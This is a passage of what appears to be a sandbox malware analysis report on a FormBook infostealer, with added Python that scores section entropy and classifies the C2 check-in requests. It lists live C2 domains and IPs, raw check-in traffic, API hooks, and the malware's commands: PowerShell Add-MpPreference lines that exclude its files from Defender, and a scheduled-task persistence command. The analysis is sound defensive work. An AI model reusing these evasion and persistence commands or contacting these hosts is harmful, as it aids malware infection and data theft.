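    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def zlib_complexity(data: bytes) -> float:
    """Compressed size divided by raw size (assumed to be what the report's
    'ZLIB Complexity' column measures); a value near 1.0 means incompressible."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def triage_section(name, data, characteristics, entropy_threshold=7.0):
    """Apply the usual packer heuristic: a high-entropy executable section holds
    compressed or encrypted content rather than plain code."""
    ent = shannon_entropy(data)
    cx = zlib_complexity(data)
    executable = "IMAGE_SCN_MEM_EXECUTE" in characteristics
    if ent >= entropy_threshold and executable:
        verdict = "packed-or-encrypted-code"
    elif ent >= entropy_threshold:
        verdict = "high-entropy-data"
    else:
        verdict = "ok"
    return {
        "name": name,
        "entropy": round(ent, 3),
        "zlib_complexity": round(cx, 3),
        "executable": executable,
        "verdict": verdict,
    }


def triage_all(sections=SAMPLE_SECTIONS):
    return [triage_section(n, d, c) for n, (d, c) in sections.items()]


if __name__ == "__main__":
    for row in triage_all():
        print(row)
```

The same two functions applied to the real file would reproduce the report's numbers for each section; the point of the verdict column is that entropy alone is not the signal, it is entropy combined with IMAGE_SCN_MEM_EXECUTE. A resource section full of compressed images legitimately scores high, while an executable section scoring above 7 bits per byte almost never does without a packer or an embedded encrypted blob.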
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xc4090 | 0x334 | data | | | 0.42073170731707316
RT_MANIFEST | 0xc43d4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
The single native import (mscoree.dll!_CorExeMain) together with the populated IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR (the CLR header) identifies the file as a managed .NET executable; the "Programmed in: C, C++ or other language" field in the process list below is the sandbox's generic fallback label, not a contradiction.
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
04/23/24-18:44:06.302513 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49750 | 80 | 192.168.2.4 | 91.195.240.94
04/23/24-18:45:09.660568 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49752 | 80 | 192.168.2.4 | 160.124.174.163
04/23/24-18:43:47.456512 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49748 | 80 | 192.168.2.4 | 154.12.38.29
04/23/24-18:44:26.966413 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49751 | 80 | 192.168.2.4 | 34.149.87.45
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 23, 2024 18:43:47.305349112 CEST | 49748 | 80 | 192.168.2.4 | 154.12.38.29
Apr 23, 2024 18:43:47.456279039 CEST | 80 | 49748 | 154.12.38.29 | 192.168.2.4
Apr 23, 2024 18:43:47.456387997 CEST | 49748 | 80 | 192.168.2.4 | 154.12.38.29
Apr 23, 2024 18:43:47.456511974 CEST | 49748 | 80 | 192.168.2.4 | 154.12.38.29
Apr 23, 2024 18:43:47.607090950 CEST | 80 | 49748 | 154.12.38.29 | 192.168.2.4
Apr 23, 2024 18:43:47.608602047 CEST | 80 | 49748 | 154.12.38.29 | 192.168.2.4
Apr 23, 2024 18:43:47.608652115 CEST | 80 | 49748 | 154.12.38.29 | 192.168.2.4
Apr 23, 2024 18:43:47.608772039 CEST | 49748 | 80 | 192.168.2.4 | 154.12.38.29
Apr 23, 2024 18:43:47.608910084 CEST | 49748 | 80 | 192.168.2.4 | 154.12.38.29
Apr 23, 2024 18:43:47.759860992 CEST | 80 | 49748 | 154.12.38.29 | 192.168.2.4
Apr 23, 2024 18:44:06.090596914 CEST | 49750 | 80 | 192.168.2.4 | 91.195.240.94
Apr 23, 2024 18:44:06.302309036 CEST | 80 | 49750 | 91.195.240.94 | 192.168.2.4
Apr 23, 2024 18:44:06.302421093 CEST | 49750 | 80 | 192.168.2.4 | 91.195.240.94
Apr 23, 2024 18:44:06.302512884 CEST | 49750 | 80 | 192.168.2.4 | 91.195.240.94
Apr 23, 2024 18:44:06.515305996 CEST | 80 | 49750 | 91.195.240.94 | 192.168.2.4
Apr 23, 2024 18:44:06.515389919 CEST | 80 | 49750 | 91.195.240.94 | 192.168.2.4
Apr 23, 2024 18:44:06.515465021 CEST | 49750 | 80 | 192.168.2.4 | 91.195.240.94
Apr 23, 2024 18:44:06.515506983 CEST | 49750 | 80 | 192.168.2.4 | 91.195.240.94
Apr 23, 2024 18:44:06.727155924 CEST | 80 | 49750 | 91.195.240.94 | 192.168.2.4
Apr 23, 2024 18:44:26.588294983 CEST | 49751 | 80 | 192.168.2.4 | 34.149.87.45
Apr 23, 2024 18:44:26.694284916 CEST | 80 | 49751 | 34.149.87.45 | 192.168.2.4
Apr 23, 2024 18:44:26.694437981 CEST | 49751 | 80 | 192.168.2.4 | 34.149.87.45
Apr 23, 2024 18:44:26.966413021 CEST | 49751 | 80 | 192.168.2.4 | 34.149.87.45
Apr 23, 2024 18:44:27.071471930 CEST | 80 | 49751 | 34.149.87.45 | 192.168.2.4
Apr 23, 2024 18:44:27.173396111 CEST | 80 | 49751 | 34.149.87.45 | 192.168.2.4
Apr 23, 2024 18:44:27.173427105 CEST | 80 | 49751 | 34.149.87.45 | 192.168.2.4
Apr 23, 2024 18:44:27.173439026 CEST | 80 | 49751 | 34.149.87.45 | 192.168.2.4
Apr 23, 2024 18:44:27.173449993 CEST | 80 | 49751 | 34.149.87.45 | 192.168.2.4
Apr 23, 2024 18:44:27.173463106 CEST | 80 | 49751 | 34.149.87.45 | 192.168.2.4
Apr 23, 2024 18:44:27.173482895 CEST | 49751 | 80 | 192.168.2.4 | 34.149.87.45
Apr 23, 2024 18:44:27.173516989 CEST | 49751 | 80 | 192.168.2.4 | 34.149.87.45
Apr 23, 2024 18:44:27.173821926 CEST | 49751 | 80 | 192.168.2.4 | 34.149.87.45
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 23, 2024 18:43:46.719729900 CEST | 53415 | 53 | 192.168.2.4 | 1.1.1.1
Apr 23, 2024 18:43:47.304302931 CEST | 53 | 53415 | 1.1.1.1 | 192.168.2.4
Apr 23, 2024 18:44:05.953214884 CEST | 58977 | 53 | 192.168.2.4 | 1.1.1.1
Apr 23, 2024 18:44:06.089726925 CEST | 53 | 58977 | 1.1.1.1 | 192.168.2.4
Apr 23, 2024 18:44:26.424120903 CEST | 60975 | 53 | 192.168.2.4 | 1.1.1.1
Apr 23, 2024 18:44:26.587049007 CEST | 53 | 60975 | 1.1.1.1 | 192.168.2.4
Apr 23, 2024 18:45:08.518268108 CEST | 55623 | 53 | 192.168.2.4 | 1.1.1.1
Apr 23, 2024 18:45:09.355382919 CEST | 53 | 55623 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 23, 2024 18:43:46.719729900 CEST | 192.168.2.4 | 1.1.1.1 | 0xf4b6 | Standard query (0) | www.airzf.com | A (IP address) | IN (0x0001) | false
Apr 23, 2024 18:44:05.953214884 CEST | 192.168.2.4 | 1.1.1.1 | 0xe8dc | Standard query (0) | www.b-a-s-e.net | A (IP address) | IN (0x0001) | false
Apr 23, 2024 18:44:26.424120903 CEST | 192.168.2.4 | 1.1.1.1 | 0xa887 | Standard query (0) | www.zdryueva.com | A (IP address) | IN (0x0001) | false
Apr 23, 2024 18:45:08.518268108 CEST | 192.168.2.4 | 1.1.1.1 | 0x4ba3 | Standard query (0) | www.bodution.website | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 23, 2024 18:43:47.304302931 CEST | 1.1.1.1 | 192.168.2.4 | 0xf4b6 | No error (0) | www.airzf.com | | 154.12.38.29 | A (IP address) | IN (0x0001) | false
Apr 23, 2024 18:44:06.089726925 CEST | 1.1.1.1 | 192.168.2.4 | 0xe8dc | No error (0) | www.b-a-s-e.net | | 91.195.240.94 | A (IP address) | IN (0x0001) | false
Apr 23, 2024 18:44:26.587049007 CEST | 1.1.1.1 | 192.168.2.4 | 0xa887 | No error (0) | www.zdryueva.com | cdn1.wixdns.net | | CNAME (Canonical name) | IN (0x0001) | false
Apr 23, 2024 18:44:26.587049007 CEST | 1.1.1.1 | 192.168.2.4 | 0xa887 | No error (0) | cdn1.wixdns.net | td-ccm-neg-87-45.wixdns.net | | CNAME (Canonical name) | IN (0x0001) | false
Apr 23, 2024 18:44:26.587049007 CEST | 1.1.1.1 | 192.168.2.4 | 0xa887 | No error (0) | td-ccm-neg-87-45.wixdns.net | | 34.149.87.45 | A (IP address) | IN (0x0001) | false
Apr 23, 2024 18:45:09.355382919 CEST | 1.1.1.1 | 192.168.2.4 | 0x4ba3 | No error (0) | www.bodution.website | | 160.124.174.163 | A (IP address) | IN (0x0001) | false
                                                                                          • www.airzf.com
                                                                                          • www.b-a-s-e.net
                                                                                          • www.zdryueva.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49748 | 154.12.38.29 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Apr 23, 2024 18:43:47.456511974 CEST | 154 | OUT | GET /gs12/?r6-=DR9+51rACou4eQBXOdoZ4W0ewB14phJf97sbOZAiDLbqJph64OQ6FfPwpwURv63eY6pg&YN=9rKtZn5 HTTP/1.1
                                                                                          Host: www.airzf.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
Apr 23, 2024 18:43:47.608602047 CEST | 481 | IN | HTTP/1.1 301 Moved Permanently
                                                                                          Server: nginx
                                                                                          Date: Tue, 23 Apr 2024 16:43:47 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 162
                                                                                          Connection: close
                                                                                          Location: https://www.airzf.com/gs12/?r6-=DR9+51rACou4eQBXOdoZ4W0ewB14phJf97sbOZAiDLbqJph64OQ6FfPwpwURv63eY6pg&YN=9rKtZn5
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                          Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49750 | 91.195.240.94 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Apr 23, 2024 18:44:06.302512884 CEST | 156 | OUT | GET /gs12/?r6-=QIIWKxrtyX7LT6NTTkxUIHQxUymhf5FB+GXjykqQ4dPV8mdQoaOANT6/8pJ3wvHey5SR&YN=9rKtZn5 HTTP/1.1
                                                                                          Host: www.b-a-s-e.net
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
Apr 23, 2024 18:44:06.515305996 CEST | 107 | IN | HTTP/1.1 436 (non-standard status code, reproduced as captured)
                                                                                          date: Tue, 23 Apr 2024 16:44:06 GMT
                                                                                          content-length: 0
                                                                                          server: NginX
                                                                                          connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49751 | 34.149.87.45 | 80 | 2580 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
Apr 23, 2024 18:44:26.966413021 CEST | 157 | OUT | GET /gs12/?r6-=993VfXh0jqtko3ENU03aV9e2gnwjzkI9tuLx/ah8zkvGCI6r8A517lqbkaAk6P8eMjr8&YN=9rKtZn5 HTTP/1.1
                                                                                          Host: www.zdryueva.com
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
Apr 23, 2024 18:44:27.173396111 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          X-Wix-Request-Id: 1713890667.07612762899732525067
                                                                                          Age: 0
                                                                                          Server: Pepyaka
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Accept-Ranges: bytes
                                                                                          Date: Tue, 23 Apr 2024 16:44:27 GMT
                                                                                          X-Served-By: cache-chi-kigq8000037-CHI
                                                                                          X-Cache: MISS
                                                                                          Vary: Accept-Encoding
                                                                                          Server-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_42_g
                                                                                          X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,VtqAe8Wu9wvSsl49B/X4+ewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLkqHFWhjPEXyPTSLtPMFnp4a0sM5c8dDUFHeNaFq0qDu,2d58ifebGbosy5xc+FRalmBQ2QY4hzEJNVep8btjXtN21kVvhi4WWi737JqnyfsKzRUqbJQEwoR5t7fXMpcLTA==,2UNV7KOq4oGjA5+PKsX47P9efI/myzj/9e1V5kpi0zpYgeUJqUXtid+86vZww+nL,9DY27ey9PtG1M7AzVTPSAeIGguIVY9cIsA/DsRO7DrY=,g2aKszYfRloBamvU9+FSKbaI/koc3kS7zllmkFk7bZc=,0gGrL7iazMoiuqlb7dEO3Xp6cxvAmf0V9RlaNBeq9FVSB88D0lWBQzqUldF0H79KCJgk4i4ryDgNOsmaMtz63A==
                                                                                          Transfer-Encoding: chunked
                                                                                          Via: 1.1 google
                                                                                          glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                                                          Connection: close
                                                                                          Data Raw: 62 66 32 0d 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 3c 74 69 74 6c 65 20 6e 67 2d 62 69 6e 64 3d 22 27 70 61 67
                                                                                          Data Ascii: bf2 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'pag
Apr 23, 2024 18:44:27.173427105 CEST | 1289 | IN | Data Raw: 65 5f 74 69 74 6c 65 27 20 7c 20 74 72 61 6e 73 6c 61 74 65 22 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65
                                                                                          Data Ascii: e_title' | translate"></title> <meta name="description" content=""> <meta name="viewport" content="width=device-width"> <meta name="robots" content="noindex, nofollow"> ... --> <link type="image/png" href="//www.wix.com/favicon.i
Apr 23, 2024 18:44:27.173439026 CEST | 1289 | IN | Data Raw: 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 2d 74 72 61 6e 73 6c 61 74 65 2f 31 2e 31 2e 31 2f
                                                                                          Data Ascii: script src="//static.parastorage.com/services/third-party/angular-translate/1.1.1/angular-translate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719.0/scripts/error-pages/locale/messages_en.js"></script> <!-
Apr 23, 2024 18:44:27.173449993 CEST | 197 | IN | Data Raw: 3e 52 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f 6d 6d 65 6e 64 20 79 6f 75 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 62 72 6f 77 73 65 68 61 70 70 79 2e 63 6f 6d 2f 22 3e 75 70 64 61 74 65 20 79 6f 75 72 20 62 72 6f
                                                                                          Data Ascii: >Regardless, we recommend you to <a href="http://browsehappy.com/">update your browser.</a></span> </div> </div></div>... verification -->... end verification --></body></html>0
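
The three sessions above are the same check-in sent to three different hosts: GET /gs12/?<key>=<68-character blob>&<key>=<short token>, only a Host and a Connection: close header, and seven trailing NUL bytes that, added to the header bytes, account exactly for the 154/156/157 bytes the report counts per request. Each was flagged by the same Snort SID 2031412, and the replies (a 301 to HTTPS, a 436, a Wix 404) are what FormBook's habit of walking a list of candidate domains, most of them decoys, looks like from the wire. The following is an added example, not part of the Joe Sandbox report, that takes the DNS answers and the raw requests from this page (plus one constructed benign request for contrast), follows CNAME chains to the terminal address, and scores each request against that check-in shape so the domain, the IP it resolved to and the verdict land in one record. The regular expression is a heuristic written for this example, not the content of the ET rule.

```python
import re

# DNS answer records as listed in the report above: (name, record type, value)
DNS_ANSWERS = [
    ("www.airzf.com", "A", "154.12.38.29"),
    ("www.b-a-s-e.net", "A", "91.195.240.94"),
    ("www.zdryueva.com", "CNAME", "cdn1.wixdns.net"),
    ("cdn1.wixdns.net", "CNAME", "td-ccm-neg-87-45.wixdns.net"),
    ("td-ccm-neg-87-45.wixdns.net", "A", "34.149.87.45"),
    ("www.bodution.website", "A", "160.124.174.163"),
]

_NUL7 = b"\x00" * 7  # the "Data Raw: 00 00 00 00 00 00 00" shown after each request
# Raw requests from sessions 0-2 above, plus one constructed benign request (not from the report)
HTTP_REQUESTS = [
    b"GET /gs12/?r6-=DR9+51rACou4eQBXOdoZ4W0ewB14phJf97sbOZAiDLbqJph64OQ6FfPwpwURv63eY6pg&YN=9rKtZn5 HTTP/1.1\r\n"
    b"Host: www.airzf.com\r\nConnection: close\r\n\r\n" + _NUL7,
    b"GET /gs12/?r6-=QIIWKxrtyX7LT6NTTkxUIHQxUymhf5FB+GXjykqQ4dPV8mdQoaOANT6/8pJ3wvHey5SR&YN=9rKtZn5 HTTP/1.1\r\n"
    b"Host: www.b-a-s-e.net\r\nConnection: close\r\n\r\n" + _NUL7,
    b"GET /gs12/?r6-=993VfXh0jqtko3ENU03aV9e2gnwjzkI9tuLx/ah8zkvGCI6r8A517lqbkaAk6P8eMjr8&YN=9rKtZn5 HTTP/1.1\r\n"
    b"Host: www.zdryueva.com\r\nConnection: close\r\n\r\n" + _NUL7,
    b"GET /index.html?q=search&page=2 HTTP/1.1\r\nHost: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0\r\nConnection: keep-alive\r\n\r\n",
]

# Heuristic for the check-in shape seen above (assumption, not the ET rule's content):
# short lowercase directory, one long base64-looking value, one short token.
FORMBOOK_GET = re.compile(
    r"^GET /(?P<dir>[a-z0-9]{2,8})/\?"
    r"(?P<k1>[A-Za-z0-9_\-]{2,6})=(?P<v1>[A-Za-z0-9+/=]{40,120})"
    r"&(?P<k2>[A-Za-z0-9_\-]{1,6})=(?P<v2>[A-Za-z0-9]{4,12}) HTTP/1\.[01]$"
)


def resolve_chain(name, answers=DNS_ANSWERS, max_hops=8):
    """Follow CNAME records until an A record is found. Returns (chain of names, ips)."""
    chain = [name]
    for _ in range(max_hops):
        ips = [v for n, t, v in answers if n == chain[-1] and t == "A"]
        if ips:
            return chain, ips
        cnames = [v for n, t, v in answers if n == chain[-1] and t == "CNAME"]
        if not cnames:
            break
        chain.append(cnames[0])
    return chain, []


def parse_request(raw: bytes):
    """Split a raw request into (request line, lower-cased header dict, bytes after the headers)."""
    head, _, tail = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return lines[0], headers, tail


def classify(raw: bytes, answers=DNS_ANSWERS) -> dict:
    request_line, headers, tail = parse_request(raw)
    host = headers.get("host", "")
    m = FORMBOOK_GET.match(request_line)
    chain, ips = resolve_chain(host, answers)
    indicators = []
    if m:
        indicators.append("formbook-checkin-shape")
        if headers.get("connection", "").lower() == "close":
            indicators.append("one-shot-connection")
        if "user-agent" not in headers:
            indicators.append("no-user-agent")
        if tail and not tail.strip(b"\x00"):
            indicators.append("trailing-nul-bytes")
    return {
        "host": host,
        "chain": chain,
        "ips": ips,
        "path": m.group("dir") if m else None,
        "blob_len": len(m.group("v1")) if m else 0,
        "wire_bytes": len(raw),
        "indicators": indicators,
        "suspicious": len(indicators) >= 2,
    }


def classify_all(requests=HTTP_REQUESTS, answers=DNS_ANSWERS):
    return [classify(r, answers) for r in requests]


if __name__ == "__main__":
    for record in classify_all():
        print(record)
```

Run as a script it prints one record per request; the three report requests come out suspicious with path gs12, a 68-byte blob each and wire sizes 154, 156 and 157, and the www.zdryueva.com record carries the full CNAME chain down to 34.149.87.45, which is the address the Snort alert and session 2 both name. Requiring two indicators rather than the path regex alone keeps a legitimate short-directory GET with a long query token from firing on its own.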


Code Manipulations

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xED
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xED
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xED
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xED

The four hooked functions are the Win32 message-retrieval APIs. Patching their prologues inside explorer.exe, the process the HTTP sessions above show carrying the C2 traffic, is how FormBook sees keystrokes and clipboard activity in the process it has injected into; the New Data column lists the bytes now sitting at each function's entry point in place of the original prologue.


Target ID: 0
Start time: 18:42:58
Start date: 23/04/2024
Path: C:\Users\user\Desktop\Statement Of Account.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Statement Of Account.exe"
Imagebase: 0xb70000
File size: 791'040 bytes
MD5 hash: DA68E8FF4E0C0D00C613FA9301CF4A37
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Target ID:2
                                                                                          Start time:18:43:00
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Statement Of Account.exe"
                                                                                          Imagebase:0x720000
                                                                                          File size:433'152 bytes
                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:3
                                                                                          Start time:18:43:00
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:4
                                                                                          Start time:18:43:00
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SdYCcXyq.exe"
                                                                                          Imagebase:0x720000
                                                                                          File size:433'152 bytes
                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:5
                                                                                          Start time:18:43:00
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:6
                                                                                          Start time:18:43:00
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SdYCcXyq" /XML "C:\Users\user\AppData\Local\Temp\tmp9A8F.tmp"
                                                                                          Imagebase:0x4d0000
                                                                                          File size:187'904 bytes
                                                                                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:7
                                                                                          Start time:18:43:00
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:8
                                                                                          Start time:18:43:01
                                                                                          Start date:23/04/2024
                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
